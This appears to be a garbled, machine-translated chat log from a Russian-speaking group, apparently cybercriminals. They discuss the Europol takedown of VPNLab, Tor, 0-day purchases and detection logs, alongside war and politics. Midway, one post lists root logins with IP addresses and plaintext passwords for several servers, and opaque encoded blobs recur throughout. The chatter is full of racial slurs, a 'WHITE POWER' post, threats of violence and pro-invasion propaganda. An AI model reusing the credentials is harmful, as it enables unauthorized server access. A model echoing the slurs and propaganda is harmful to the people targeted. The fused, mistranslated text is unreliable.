@all turn on Rossiya 24, there is a video of Ukrainian troops surrendering divisions he is a saint. He was not tortured in prison, so he is innocent of the Kadyrov trial to call him guilty?
By the way, kharkov murdered a prostitute, a dag and a tajik in the woods, who was put in jail for proven murders
No.)) I apologize in advance, do not talk about the Russian hero! Allah sees! Be quiet! Were there any witnesses? Patrick, why is our bearded friend at large?) Witnesses were tortured too?
tesak was the last russian neo-Nazi who went to prison for proven murders aha and Furgal is our main murderer when they put electrodes on his balls - you confess to everything - confessions are obtained under torture - I repeat, tesak is a murderer, i repeat, tesak is a murderer, it will outweigh all his good deeds you can come to me - there are cryochambers, for santa clowns not only with pedophiles) tesak fought with pedophiles, 16-year-olds in general %) ok, tesak is not worth the example of five) tesak is a murderer tesak fought - jailed and tortured....solve problems, create a party, fight for 10 years and win, you will take care of the kids as you see fit...solve the fucking issues bitch, they're all there and no one gives a fuck about the kids! it's the bad guys who fucked up 5 out of 6 drugs prescribedPatrick!there are problems everywhere, but there is a difference between nationalism and nazism and you know about 228, how young people go away for 10 years and they do not give a fuck about it from above@angelo, you do not understand, this is different)))))The Chelyabinsk region has some remains of nuclear reactorut a problem, especially SEIC))) fuck, you know everything yourself precisely, why the fuck should I prove anything, no one gives a fuck in Chelyabinsk people die from cancer like flies Where is this?Fucking hell, there are so many problems here that they brainwash the kids with fables about the Holodomoraga. They're all in jail, and Khakhlova is the one who martyred people and raped children. There's the Tsapokov gang, You live in Ukraine, as far as I understand, you can go so deep that it turns out that there are phishers here too, and not just a few ministers, gubberpidors will remain faggots, play the piano, when will our scum answer who is killing people in Russia?When will ours respond, Patrick? The neo-Nazi junta will be liquidated and put on trial, civilians will not suffer, only people will die and Kiev will be ours by nightfall. What good will it do, except to increase the prestige of the grandfather and an additional reason for the vatniks to puff on the Tsar? And Tolkuputin will answer all questions today, hopefully by tonight Kiev will be ours@kermit your Russophobia and anti-Sovietism I know, I will not treat I will not even write, why the fuck not Golikov hanged then?No one is happy about the war, brothers, but this neo-Nazi gang of Canaris fodders should have been sent to court long ago, you're wrong, there are no questions about North Korea nowVon, missiles periodically fly into Russian territorial waters from North Korea. But no one seems to give a damn. And they have nuclear weapons, by the way. But no one got excited@patrick, so they did and did. No one will ever use it anyway. So, just to frighten people into using nuclear weapons, the war was inevitable, Ukraine made a bid for nuclear weapons I would explain, but I will not do it Are there any real Indians? Can you explain what's good about it? I never understood and still don't understand people who rejoice in war. Especially when your country is involved in this war, if you did not live in the most beautiful country in the world, you do not understand you sovoks. you did not live and now you have poisoned the lives of future generations. lol I will not cure your eyesight, sorry, he who does not want to see, will not see.
you just didn't believe what i said about postolympids, now just turn on tiviset60 gpicoins
Don't take that shit@patrick, what's the good in all this? Kopecks.elizabeth allOmir fucked upNow, the chinese ships have sailed to taiwan :D and it will be a right move for the general noise, I would do so taipei and can fuck china what?:grin:1 wood - 1 dollar) stupid and dumbest stupid, but I'll teach you 2 zeros and always 100 rubles per dollar, so the transfer will be easy soon crypto ruble!the market will be going down the drain, but we'll be able to buy stocks soon... The MOEX index is -28.8% `:smiley:@biggie don't need to go past sartiranado drink viagra, then nothing will fall at all i can't even buy Dobry Juice now - it's americanskii nato nado accession, then the euro will replace the ruble and nothing will fall at allxx, and if it's american?buy zhigelvskoye) fuck, go buy a Zhiguli) and makbuxazin up the ass with iPhones as the iPhone put the GDP on the dollar while the dollar is 85 so it is so I understand that now the latest model of iPhone and mabuka are those that you have now and everythingThe black digger found a WWII-era land mine in the field and personally reported it to comrade Stalinaday a little humor to lighten up:don't worry - your house will be even betterbabanubara all over ukraine fly))) djblo do not need bases, do not need roads all airbases are liquidatedbabat compote, i have already defrosted djavols)start preparing sukhariketa -polest-drive all pvo liquidatedketa went@kermit and i told you - wait until the Olympics end and you will see the end of banderites fuck it up, full fuckin' kuev, ta kuev, fix the bug, royal pokemon) well you're a lucky guy `shake my hand` when i caught the disconnect, although i had a disconnect recently, but it's normal, it's alive ?no, back up coolpik up? that's the mysterious Anglo-Saxon soul...?????? i got confused with pickup))) which literally means "back up" Ж)back up is also an option, copy what you need and format them back up, format and unpacktovarichi, suggest a program (with a cheeky deletion algorithm), that can quickly delete experimental/trash data from SSD/NVMe - 195 GB (209,902,159,158 bytes) this is - 17 million files in 1.4 million folders/subfolders), the wind will take me 24 hours to delete them) is ConnectpongpingeyJhbGciOiJB+FRU5XawCJd30LLaqyep/NY62u8RP548rI/IoOtwGOil6et0fNlulmcpSWGDUfbEHZPjKNINvGV1BSTYHmjGkd5QYXLw0SE7XZi6ZN6HjLrANY/ZQI1jqcBO7q29yPc9IAHMWKZImT9cv0Pn5kKH0tStagy+tczH5efW6RBZQjdXnElWdZZgnG5FXWVJthanksroot 89.41.182.28 Lc4z6sUzR2F18id9VN RO
root 5.181.156.69 eiW? aich4uub MD
root 94.140.114.15 WTk3E0YnOGgum8U LV
root 45.89.106.67 34fhjdgEN3rE5ff USA
root 194.135.33.241 34fhjdgEN3rE5ff USA
root 5.181.80.106 34fhjdgEN3rE5ff USA
root 185.99.133.120 (mimjJR004@A8J New Zealand
root 142.11.209.57 JH33UZ9k9QKZm7e9n USApok only 8pcs ready so far, will be ready soon!throw in 12 vpc, пожалуйстаПриветeyJhbGciOiJBZQPgb2pjI3qchpCSVY1KfOcyFs5CTWI0kEbMhcnAG/F9hVcQt42S93Pi0qK8tMKSD0YTaKLOaaAPgrsInBXmtCQ0eG2a3C12RqQO/IDdm+A00qj8eOoUZrRi9vOwrGMr9O+t3QfEZk2Lgg9j5FAZC59VdfU5YR/uEI2GiHglydv6hDC7M8THXyveUEuwWrEFeyJhbGciOiJBhJhzBalhywNUqRBoCP1Jxl1FqEVyVmQNAtg1yo26KUcjhH8lag0NX8gbmIuHSCmBS6/FcbEeapQP8jbtTjrSYASPcZnXkaoXKGuvMVXSHM4Gu+q5tW2hY/D+LdvjFKDfbUhX1g0T1yAX1aLgxqzboBvYAMypbpkDAFanbrRO65BYGHm8EjXGPzSkCdS1i9sDZ3kLtzGorqsWQ/VnKuLRFHw1jrzU7j+9dGU1hq5CcPb1qrauE6veAlO/Kx9aMKHB2wMihmwVDRUCf1FIQnCCyhaXv5bz20Iqci1SbJhmwYI=eyJhbGciOiJBwFvuCWyfu7655Els4wntfsz98qcxCtV7d0AjsvCZAgVgyeOsxfbS+cm0UYOuoeXYSUcS9SJIY20ijyvCRNO5XZi89Bm6YOzl0ArHc4e64Oy8yiD0aWoupvIFepEQRd26qrremY+rL2BX0JYMV3tzvcHW55/Oqr4RaWJ6Vz9U8Zc=eyJhbGciOiJBp+cf8+f9YVz/5crg7PxVeELmchj50DavdNx6RzIYkLJMEbCYicu3dTFaL7LDOo5r4MGvPFjr1fv/I1fQ6outgRLIufZ9D3e+Nok+zM/7nJZ1s8x9ylkO6pfBCJfQ4dmVP6YZRYqtYIIrnQW0eXYb69AO3ssQ3ZnyQBJBjwwvibKn984nq9NKBb6wt0nOhfw7eyJhbGciOiJBCSy7iVvpur33m13wxviKsmmJ3tfWfWwspxq7RUYyr+x6l/A/oEAEOa0p1skoYDHCq4qMkZHc8pGV kermit avatar put it up)I'm just a jolly vet tomasno sport is not only in the TV there da sport is for the bums and I do not have a TV I do not only watch soccer tv in general I do not watch sports not I do not watch soccer, You probably also like Locomotive. We'll sing it every morning and I suggest making it an anthem://www. There's Mikey bought Blizzard for 70 billion !monsieur knows a thing or two about perversion))))))> fuck and eat - perfect coincidence for the evening )
And only 3 days late on the payroll... i'm afraid to imagine a longer timeframea then... smoked on gutaline smoked dumplings):new_moon_with_face:extra.option - a black sauna, there's also charcoal for roasting then dogs) but the meat needs to cook longer, it's tough :thumbsup:fuck and eat - a perfect coincidence for the evening )let's switch to black: whores should have dinner :grinning:the words "tight" and "whores" in one contextSmall thinking. We should go to the whores for dinner.Ratatouille them make a stew of pigeons, maybe the whores will not be distinguished from the chicken ...Thanks for at least reporting..... no news, waiting:joy:You need to run from the room in which you were placed. accountants after drinking bitter will want a sweet and arrange bdsm:rolling_eyes:It is not uncommon, when you go to the accounts, and there ~ accountants ~ great people, vodka ~ eat ~ drink in Accounting May be better all together in the accounting department, what is the news? Better in the morning, eh?  @francesMaster Race - Pulling On The Boots
https://www.youtube.com/watch?v=y_vyEt4AcdQ
``Geez, I was just about to drop a cool track ((oops, enough of the youtubes)''.
https://www.youtube.com/watch?v=T69exrSNyMU
I understand, Cat, I'm an extravagant person, I know, no offense, I'm nice WHITE POWER ! Let's listen to the white wolves and the atmosphere is off the scale)) Listen, are not your ancestors from Venus? How do you like the name of the band? Von I come up with this, are you a latent nigger? I didn't throw the link if anything) but I like a good person, bro, I was born in the USSR, to me any African-American is a nigger, what shades are there I don't know)
You started the topic of racism with your link, or it was sarcasm, or you saw something in my message before that's not where we went, my fellow Aty-Nazis:D I remember the Chechens in a country in the EU were trying to shoot me and wanted to stop me, it's amazing) in Paris at night you can easily get beaten up on both sides of the countrywhy, I had conflicts with Negroes, they have their own problems with us and the smaller minorities,whose ancestors were serfs and rubbish for the nigger stranglehold in the south if you've ever heard of a man from Dagestan in Moscow I agree with you, you're not inadequate then just usually had run-ins with other niggers I'm just an example what's a nigger got to do with it?and what's the reason to beat the fuck up? the term for jurisdiction, most likely, and for the nigger ego) everyone is equal and everyone has the right to be free to act as long as they do not disturb others but if a nigger comes up to my kid and says he's the best, I will break his jaw and arm so when he pees, he will remember about equality or not? I am a very tolerant person you out of context so you in rf would not understand itThe schools, already actively talking about freedom of gender choice. I don't give a fuck what people do. Who fucks who, who's a boy or a girl, who likes to eat shit or do heroin. But not when there's an attack on the freedom of children's rights I can't believe it's all so chaotic, blacks, LGBT, it's not a question of who's right, but what's the point of this bullshit and their ancestors are from Africa, etc.Well it's true they are African-American they always need something but obviously not on a level playing field This is one side of the bullshit here is a little different, concerning the blacks who decided that they are African-American and just stuffed their various laws and codes with this racist bullshit. just came and humiliated all the snowballs more than once))))) and everything we do we are also responsible for together as in the 90s wild capitalism today a bullet in the forehead to a competitor and tomorrow pray to god or a christian whether you are a nigger or a muslim is convenientKot, everyone lives by the principle "when it suits him" plus+ esttestTrue Nigga Lifehack _))i think that blacks only consider calling a "nigga" racist when he benefits from it.nigga_negga
https://www.youtube.com/watch?v=N1qCKOInezY
``Ahaha clearly! It would be strange if their report looked like this: "We broke the VPNlab service and shut down their domain, the server room was stormed and found two illegal Ukrainians, a Pole, probably Kim Jong-un's grandnephew and a Negro. The negro was found only when the sun came up."...Russian is not my mother tongue...you fucked up the comma when you just started touching yourself with your hands and thinking what it was, I was special...something like an emergency response office or something called that.
@angelo be an emergency erection specialist?:grin:fuckin' fakie
Europol said it seized 15 servers operated by the VPNLab team in Germany, the Netherlands, Canada, the Czech Republic, France, Hungary, Latvia, Ukraine, the US, and the UK.
``Some kind of emergency response office or something called that.
https://therecord.media/europol-takes-down-vpnlab-a-service-used-by-ransomware-gangs/
``like fighting cybercrime they can do everything in 1-2 hours but the servers aren't just domains and the word dick is written like a fence``` are limitless
there's no way to beat the math. most likely, they didn't just take the domain and forget about it. the possibilities of such structures that set up a breach are limitless. i don't consider the FAQ a guarantee, and i like questions. i asked you questions. why are you trying to pull my finger up a man's anus?You can go deeper, was it about massaging the prostate? Have you had experience or did you ask for a massage? That's good, because it usually hurts pesimistsKermit, do you still have prostate pain? You'll defend yourself on Tarkovsky, but I memorized it like mantrazaponi, it will come in handy in court. People are criminal by nature, but they're weak. And only the strong, the chosen are capable of evil. Evil is a stepping stone. If you cross it, you're free.
- And good?
- And good... It's such a simple trap... for fools.
- It's a shortcut to civil war.
- And it hasn't ended since the creation of the world.
- I like the dialogue in Tarkovsky's movie about good and evil. How do they fight spam without logs?and then fuck it and logiblah, this cartoon about logs is written everywhere aha, robin if you believe their FAQ, the lack of logs - the basis of their service was to show the examples I can and deeper, but zp no how deep everything in this world is relative good and bad if only in quotation marks canonical vpnologii were still included kermit, about work - yes, I agree. this struggle between "bad and good" is a constant for all time
oats for kittiesMozhewelnikAnd the grass in the bucket just grows like a kitty can you imagine?! You're sitting on a rainbow, you have a bucket of grass, a mini factory with whiskey and girls
You have no balls)) Alla, I'm going to the bar! I told you about paradise with guria a long time ago, we have a mujahedeen among us) Can you imagine?! You're sitting on a rainbow, you've got a bucket of weed, a mini brewery with whiskey and a bucket of girls and you can go to the rainbow, don't they give a fuck about the rainbow?dusha or dushee that's where the question is, we're in the soul kitties so if he's your kittie, then you should at least sometimes make a show of what bombshell. work guysRuben Yakovlevich, we do not disrespect or insult our fellow man in any way ! while the flatulence, i think i've calmed down a little bit, now Garfield is going to be insulted, aren't you a pussycat?they don't give a fuck, they'd rather lick my balls. i'm being castrated and factored in. they say europol, the state department and other cops have defeated who's bombing?the whole globe it's their fart so bombytstryam sharpdefeyspeech cool yesterday from 15-16 hours fucked up a lot, when I decided to check why does not work, went to the lk - and there I TOOOOOOOOOOOOOOOOOOOOOOOO...kermit, what is it? yes yes ``
https://vpnlab.net/
```
kermit, i got a hunch @hammer@elroy when you're ready, let me know. > Vaughn angelo got the trick. > oooh, i feel like i'm about to post some more dicks, i love it.
Nononado! You stop it with your jokes Hammer! I'll take my wife's card away... to keep the money, you can't give it to anyone on that day... tomorrow it's Epiphany! You don't need to fuck around with it...
fuckers,
that bread
for the sake of
front
and behind
♪ they give us ♪
and behind us,
God forgive them!
And those whores...
# Lying #

¶¶ They're the ones who suck ¶¶

♪ not giving ♪
those sluts...
Fucking,
Fucking bitches!)) That's what I tell them ) with my brushhhm, pay for sex - GENIALLY clean their teeth at home let them eat) you have to pay off whores with your dick, not with food I pay off whores with food, but not for long... All ... I'll keep quiet ))))) and stop writing me about it, I'm too suspicious))))For those who are nervous and worried and watch the news - everything is according to plan, there is nothing to fuss about, panic asideWhat is the news, you're a whistle dove! I've got news for you. Hello, everybody. The pay is a little late. Evening or tomorrow, most likely, he'll write! https://www.youtube.com/watch?v=EqLLL2HErxA ``test`` test ``like a fuckin' test in Novigrad will stink like a shithole fugas :DGomer, and even cool shit in a bottle and there corsair biggerDa we know this scheme Alf (you never understood))) Bitok falls down. While he falls, the franc will not. but will begin to grow - he will immediately come himself)))) I love it!You should put firecrackers in the poop... I usually poke the poop with a stick... I'm choking on coffee, and he's drinking cognac...One of the world leaders in buying 0-day exploits, US company Zerodium is interested in acquiring 0-day vulnerabilities for VPN on Windows, namely ExpressVPN, NordVPN, Surfshark. Exploit types: information disclosure, IP address leakage, or remote code execution `o not that here
https://dump.video/i/NuqCpuCt.mp4есть
https://idiod.video/wunqh9.mp4хз, in the west, maybe there are some places already I'll never forget the guy who rode his bike and had a big rubber dick instead of a seat. There is no such a thing?) it's because he does not have a bike Zloy )) pi... once! once time once +@all now disappear rocket, I switched to a new version of Tor, n apara min will disappear now I laughed through tears =) Come on, what are you guys! Just started working!!! > Porn to discuss with them and normal.
And this is the image in society, to the point that "you do not want to tell us your page, you're a criminal, what? Are you hiding?", in the management company asking for "Whatsapp" to throw out documents ... Porn to discuss with them and it is normal. Accounts in social networks should be maintained, to feed them with some style ...
It seemed crazy before, now if a person has no page, you get suspicions. The "art of war" by Sun Tzuya do as you like and keep to yourself that you like so no one knows for sure you like it so you don't know when and what they will say against you a very simple strategy - the more information you give about yourself, the more harm you do, don't like it so control the likes in facebook.On the contrary, you have to be optimistic to believe that before the internet was not controlled by anyone)
There's just a redistribution of influence going on)otgotgotgotgotgotrebootedotrblack((yikes, slack, otrotrman, the case естьbennyeyJhbGciOiJBesenEOqEDv2zHl9ZwizxEcB35pEWf6WlSZ+4pVrekxssW5uWKE4jp9RT299qPkINvkJxOIYnbkbYlBCbUa48PQF0QRwXgOErPA7XdEIlrxamAdeLHBCRXpQH6RTmCwDS65QcvgoFdKiQp75a5G2waB5OhHcLjiTOwAjU4XKMfp5gDd88QPeZxLMf3RW1PtXARsR0UhtQWh2W/nbFSjN8yNZAQL+OCarMNxMUYpqeNePYilgSyUqzZk2Rue3QTz/TFFRvN52gRSQ5ucvol0NJ7sxCf8fHawchjenKk1JAesdnE8M446oBxhSPGtEmQYmbozod3QnXu2cJDXpHyJ3f9gjtS7+QqhaltRF8zgAJ1WBa+z35qI2ZUWZFd37q/uRZ/lZMevwdWG8or/XrXwYlKijjC5xqQqrsIHRZbl04xUqvUZ3J3PVxzQxFUjQ7/JtFCIkSeSPYhF+7PTf9WU/LSFqC3cnNV8BCpK5ko1j6huOExsbgXms5/nDu/jAcrIF53IWEMi9iQlqIQIt39Nfr+ez5n+nXLTnHNBrNmaF5RNo=eyJhbGciOiJBOUKIm2lNIXw7dVnjWGc3YhwqV0/UH+vw1CpRV6U90LYIfRWjeKHGWm5Vi0sP0KmDYY7s+yh2v4V6Goo+zEYS4w2V1ZqABSjBWnLQ7cwKB7qOfyCezkIFmCIkeYPzoD3SxaZF7SLYw13drD9xEWGUypZfyJYbwtIuf4SOThIO6uayscCHdmVnEkBCHWOtvzUnukhHHiQUBP8bLDsjpw0HaY4nd/y4+eP729vZhg2IhSq3jSXMeCjwWxNVgUJHcxL6czm46bfq8Fsnzc2bgm8RbriHJ6dinePPpagAl50ynDYsJ50LzVrmp9x5bQBiRXXWzZt+WpYv4NhbLnXu/rSIkp7E+RQL1eVh4zzMwgHG1CxisC6zdDqEaDCeDNAO76vVu6goJ+LtQMyrReUkPD3NtiypM4yubr61K7l5syP72Trz5yQ tutotr{"$binary":"mEr9EfUNDk2+dyDqBDzWC0LGMF0DsZCHt3xUpWrLHd5mytX51GiOwMHa+v3gd+YcNSyijZ6+sFpW76EOY7xUQZc+9kAcS0c1SYapO6nucDGkZ3VsCHjdW71Jvilq6fu0bsAHabz6Sa7P2P5sRT+ssFDfCEYP3zD9jmzLmOGT7/DXmLFQd1sqzv3mw/AqMahhT3T4FDpt94XdL27aUmb8oiKqID+96AKoGQIldC0PlWU="}{"$binary":"yxjxEQWDlQBKchRhFDcvB1oF/bCrQ0+4E7v6pVo6XXbf/wnFGgJfxE4hBKqL47lox0bSiMOq/1SApxfcOsvxcNS2KiB+EZvsM+G9aVK/rUgNU692R8Hh9wx1KHrMsyQ/ho7bLfZSmBXOA03ZYMeoDjAXeT2zpAcyLNYw51SX8n9NpQzoDV8fVaGBcEA/VChBScjB0X+9eyaaCb2NgGeIqizoX1tqNkMZd2XnHce4qQzqn44e6Bno8D9CoY9clYHf0goxaps/Fl/eZBpf54Di3EiYeKqhdgBssi8uq+SSsHDZqu3Q2pqFAKXEsK63A8uJ2wVfMHws22XcDet39473NkMguBBWEoPejclejqnZVbfPkwJBaNUUNJ0dM4AykuWP+QlYZ8pTy7i6WDGnMeWeIZ4NA0jjBZZdOHpikGazloS9i5oQr1nIOp0OdZ2KsPB1N8nrAWKcHfjzSk0+u9uQvlN6PAUXGDt7zSTgFdhpI3/RJpHcJb2eh9aYDhwLsWXjEav0tJkBtQq4ru4VsldtJut0szu3LX+nRMN+S2r8td1/4Wgw6sFaUFjZGoyHMUWWAWm86ck4TP81IK1PE65TUuDy//kU4oowdjOpvL2Xg9t+bdz+91zPzNN6oW79fCCxKztRs9kk4Ge9c9CUf8s1j6jxXw2TgIIjdJnsWDfYebwsUskHVnOhjzot8Gx6vk8Sfii7cG2J1enkbe9DBW2f15t7qx9UUUaC/RUV3yHhHt52dy+KnqzXWyrzN8yje5o1cDP3+/ZRVoR0TGphZ9JPc+A24e5/+NyXBs4YBwykqEnmJaaFPu8guY04JCy1XRRG/rQHQZNc9pOpfrJcK8R2"}{"$binary":"Fb25YpyxAMh3j9dxJ+IrPRAmgCl5SC0XOtCMG8ABhkoTDmXNPfyUTT0kcmPwrwxG00vPv+w/VQ2b4voGVK0o4XzzYyafEZ7+GVxtaLzxbaYBQjkTwD87MtTbUOcfC8Kv8WeQv+MeCxHoN3gOIKRvNWNTgSDelZTFD/9njWM0Wjw5v6VbWVLk0JO2YbzaTLFj4LUGWKOHvxCyUnZThP8PHAtIvpstSDIDpA/E"}eyJhbGciOiJBkDp5pJ9uy4H5aF+PgNpsw/uAskLF6Ea5+Rs4nt0u7vE0JYLjBT3Es4cp4OsOICy5XPANw1GiIBNN7xKsQ6enQvOibK62/n1pQPuJVP1tH4FNO/EErhq4zQQf4jJ+bS5qbyE1MRl8N/YK6ESng4rnVqlpvfZ+oypTs/YJAR0fVl6xX9PTpzFmI59i9BtxOIW3eyJhbGciOiJBroNkSfUQjGrP/Pp4tj538GEZwwYPXD367EfF6UsxleWqZY69AmN8/Y8MLoYoww0RrJ5GeLIK6HSqJZa2dTwXZQUNvm982mXitRFvpo4GtjTHdeLCzrf/2enYLn9bUe0dnSsP+m7WQRRQ63tplCIL2z+8g0U0k2HrqVtmPjlqmuSXLJ/PpnXAfWAgYz8OJNM3Cz/eQoFOPRkM54n2sgEwn7j4SmvKSBoOsLSK32B5u0PvbRBIWvm9Abux8xG45cWuIyjAKsomdE1RglUDgG1FrxfrcV0TyzoEzJ39Mf75tgcT6deuydY44ZK8kn5a1EpxnSie6T5YtGiYzjmiWJ3ibn2a9vPixin52BcVj/SoND3ZeqQsuFBdqy0kULSaE9AoBZ5lEYfZrM+Kon9SM/7sRNBaug25vJiF0CpO0W8J7jAQImDESw49Q02+zR+vkwniAJVODzsMV/WXYuCd40JVXRahfT+05H1Rh+Qnc0VxPtVm6iwCR2WmGDCQNgJv1CEns4SxSYGgCEvske0ddcQe6MTKDZ31evlpUMWxADxEfUQDL2+oAlvYZmQFQe4d5DJR+//www.youtube.com/watch?v=LKo0D8Ot4hY&t=6s`:partying_face:@angelo do not worry, I play black...`https://ok.ru/video/1035121332533` as quailed)cyber fighters, all happy Defender's Day!:sunglasses :beers:but cool toy/shooter, especially under 5 years old kochari)
the music from the terminator is awesome!!!
NO FATE gentlemen, NO FATE...oh man, i thought i almost passed *Terminator resistance*, but the Poles have *Fatal Error*:grin:i got tears in my eyes when i wrote it - *ostrAt* - russian learn, by C++Bols, sadness, sadness
Yesterday there was so much
♪ And today it's a pity ♪
And there could be no other epilogue.
And yet we've written our names on a tablet

Let's get some rest, not much at all.
We'll clean up where the dirt's been
And we, the children of vice
A great destiny awaits!

The grin, the keenness of mind and experience.
Hunger, anger, and a fire in the soul
Our strength - you will be drowned
What about the Ukrainians? They are yesterday's brothers Slavs, a truckload of greasy 200-year-old bandera fighters... Write to the police... I would bring Crimea for a good slice of salamo... I will go to the bandera fighters - *you bastards will answer for Odessa*:sunglasses :smile:It's time for you to lose weight) you eat a lot, it means you're fat?
i'm not you anderstendlouveldanea?) you're getting fat today, uncle200k ???
i'll take it all!!!:laughing:Considering the exchange rate, it's possible to fuck up the price of a lakh. There's no competitors, there's no market. Why the fuck should they get cheaper? It's a fucked-up price for a 200k notebook. It's not a market. They sell it with elbrus, they're now putting them on state orders and there's no reason to develop their own market. there's no market for them in principle, they're trying to just scale it up. i don't argue. they're just working next to the Elbrus factory and i saw them, it's a shame. only i put up an ava. and fucktroll? @thomas don't feed the green guy, i hope @weldon is a good troll, and he's just a fatty in general it's very expensive and there is no x86 and 64 support, there is a bridge that translates designs from theirs to those just crap these prods are so expensive, because there is no mass production. They are so expensive because they are not mass produced, but the PENDO sanctions are just an excuse to upgrade our PCs).
I have read about Elbrus more than 20 years agoBaikal is very cheap, as far as I have read for the masses may be BaikalIt is also a question of the fact that MCST has no resources for mass production.
So it will mainly be in state-owned companies and some corporations.> It would be funny if it were not sad, soon we will sit on the elbrus
At least it will be without any of the potholes and holes that x86 has.
But the hardware compatibility with x86 there is original, in a bad way, but the average user should not care.[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/announcements?msg=9kGr3BWKGRKKwuN6A) then we will outrun bodybuilders when I did (20-30 min approximately) - approximately so and pumped) in Russia most likely will not enter, a priori will be like Abrasion and South.By the way, I understand that the L/DNR will also expand. I remember that they said that Putin likes pretty dates. Nice note about the date, but I did not notice it at once[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/announcements?msg=MjRs7iYfiwtM7Y5kh) as long as it is not on the bottle) `https://3dnews.ru/1055545/brakovannim-protsessoram-elbrus-nashlos-kommercheskoe-primenenie ` or hang it on the fridge, as in the article wrotenopros - at least one room in winter can still be heated on the 8 and Elbrusa)) cheap and sorditonu that 8 Elbrus took my rizn 9) cheaper, @ weldon available for them) you forgot, we have in the blood to finish file file)Just wanted to write about the price of Elbrus - I decided to type in Google to update the information - the first link: "In Russia they began selling defective processors Elbrus" only 2500 rubles "I think they will quickly get cheaper, well we will have to pump it upa will not throw would be funny if not sad, soon we will sit on ElbrusVovan likes nice dates::sunglasses
08.08.08 - for Sukashvilli/Galstukoyed
22.02.2022 - for the clown who thinks he is a joker, he is preparing a necktie and waiting for an order from Fascinkton...
thinking in the meantime...
eat it for breakfast, like Sukashvili, or hang himself with it:laughing:what about the Khokhals?
I don't know, but there is a web-version, and it can be easily checked, i.e., if it reaches mzhVatel.ru or if the service is dead? Does it reach mcg Hey all, I'll write to all @all guys, and who uses the jabber 404.city? Is there a connection or is it dead? Maybe it will work fine I have a stutter I do not quack, and quacks.... Strange!!! At me - yes. Toad quack? Waiting ... zp did not fly?) Good morning all! Hooray comrades! hello to allWe all have a comfortable work and productive week, let's make it happen!!!Let the workday beginGood morning.good morning утроeyJhbGciOiJB8ikt+rJsmjE9ph/hp7kyRPpLZqMURTfSjiS9NTDPxnSid6ibaCzosG/d4EVukMGJb6e48hfvV1lN03c1Q5TlWS+yIFNkUBKE0HqFkWrEvlGpdCWxPSzoOk4ri/DIkNNXvREv70OY6CXD9BJZ8dNZOxJDS/0uLPYVCMPe5UlTs/w=eyJhbGciOiJBC5Lju2Y8pZtWpEmbX3h/gmo+sZcD6KnbjmpyyZ09PPRsomL+9LxuakLjVrjBtcDt7k0JBT/Y6MasdekCvdMKNwo+vxQa5iOBvqqYAobr/kpTPgEl7M07fjzi64ZBk+oJs5EZnuHBf0WWtZiBKIzULHbfyd/UqspaGiJyEeemip5O8yT3nRjWMW8qS6bv8E55MiHkc8A544GTyT+a8T8/2DUz6zZRPU2PSnIO1G26rRbITx/wuq0R+hDROpoMiHSC8Wq1Kbzn6yFokd1YgMMo/v2ZGV4KSPm52Jd6HjKa1ZYanbcROmoQm5MAwsfffU2Rt6a0L7skla5N6rVfcxZD14bJBj65EQlEjPko7Aq78j+LgNC4n7Ot3wTyihQI6L+AFzl7YcYfGfsYuGI/2KqIwkJ06Zi1sNvYTqOyqBJHC0leWsibvYh0DD80lN/EGgNP6CfxwoXDHObtWrDKTf6lOFMsJuHXdgref2Lv9RQxArQcBxGQgsBnXRPVTcakN2AmK+1RstvP0RItQ+RMYzkZfuBHs7tIi0+fojxJ+Hphy06E73Q2P3d3qq/6xbv585ch5F0OttPqtn3nIPNUEPk673QNTtFQiU7atSgM1er5czk=eyJhbGciOiJBBKlaqBKM4VbQDeZz/6YsE2VCqAVLxW5QGiDU6mkJun0ss3neFY7ZNitK+iTH+zNCIeHEOrSxbyVEXEAaEwAUHLA92uUJvHbZbx4IcmpA1AAw8qzJ2dBqRB830mT/33BV4X8nbA1TyjokxqXhRMPQULthjuvyRtbmS70nJFokOEs=@kermit write them all in and out of the gate in tension about Voronezh "African children" is just a warm-up.... it's a test run ... where the fuck are they going to get it from? Gates is poisoning African kids with vaccines. Microsoft is a Russophobic company... let's impose sanctions against Western technology... let's hit Voronezh. Any other options? or fuck the ua and stay with baikals and bolgenos... now our hackers will change the earth's orbit... panic a bit too soon... this is itdetails are needed in the themes win preview so this insider-link I can not, and the assembly - insider preview build 22557 this is the users who have decided to try win11? this bullshit periodically offers when upgrading lincatac new build came out, now require an account, either home or pro... on reddit snot brook brat live on the pro version for the pro version account is not needed not far off the day of auto update 10 in 11 and hey give accountnetread the news ... you need an internet connection and an account to install win11
angerfist- stainless steel
``who wanted some music?
```
zardonic - bring back the glory
``Here it is, they're reading the ads here, put them on avito.`` Well, that's all.
30 - that's 20 screensThere are also only for reading) a total of 600 eventswill seeSee to unload at least in tchtSelect the log and event codeTo do this, you need to create a selection of filtersThere can apply a filter to the event code or eventseach event there separatelyopen logs, there look only through the SE ?come back to the question, how to display all detects in the list in Windows ? i have no @#announcements only for ads addressed to all@mitzi true@hammer here messages will fly away in a couple of hours and there will hang waiting for a response and looking for a woman, 177 brunette no older than 20 years (the first free ads) @hammer the first 5 pcs - free) here are 30 detektov and need to copy all files by the list by the way, @demetrius , that's right, who needs, he will give a piece of paper with a question and you'll announce, although it's possible so it is a list here too)) guys, how to look through all the detekts that were?no thanks everything, there will be no second GeneraleSince the creation of rocketon it did not end "well it's starting..."`look for pictures of dicks "now there is an important info ))))))) just write something important thereafterafterafter you can show pussy, but there all on serious stuff#announcements#announcementsmust have seen it Dim, you just did not, a long time ago:D so you would say right away now, not a year has passed !tx come#announcementshammer, YES, ridonly+there is a dough, and now there aredemetrius in my #announcements blank and the answer, was not, but appeared, after the post!so far what are #announcements read-only? @demetrius , and make a test post there for @alleymanyone does not go there by defaultonly there are 140 people, and here 160[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=bCM6ZhbXY2KtiazYp) he open channel@all who is not in "announcements" - write meSee what Thomas suggested and share your impressions.so keep scrolling.Right.-https://www.youtube.com/watch?v=0Vi-4CvAvWQ the song with no lyrics i can't see.i posted it above.suggest it!- come on!@angelo get together,we'll sing another one.- no.not sing me a song about love.let's hear it together!should i talk to the cat?- come on.who has what song on their mind? -https://www.youtube.com/watch?v=0Vi-4CvAvWQ i've been sitting at the company for 16 hours,i swear!- come on.I've got some time to piss on this. Why are you writing this? It's my favourite song. Why are we so grumpy? Friends, I love you all. Let's sing a song. Why not write important information there? We've got one channel, announcements, important alerts, sort out the chats in a human way.I've already fucked up my conversation with my bosses. 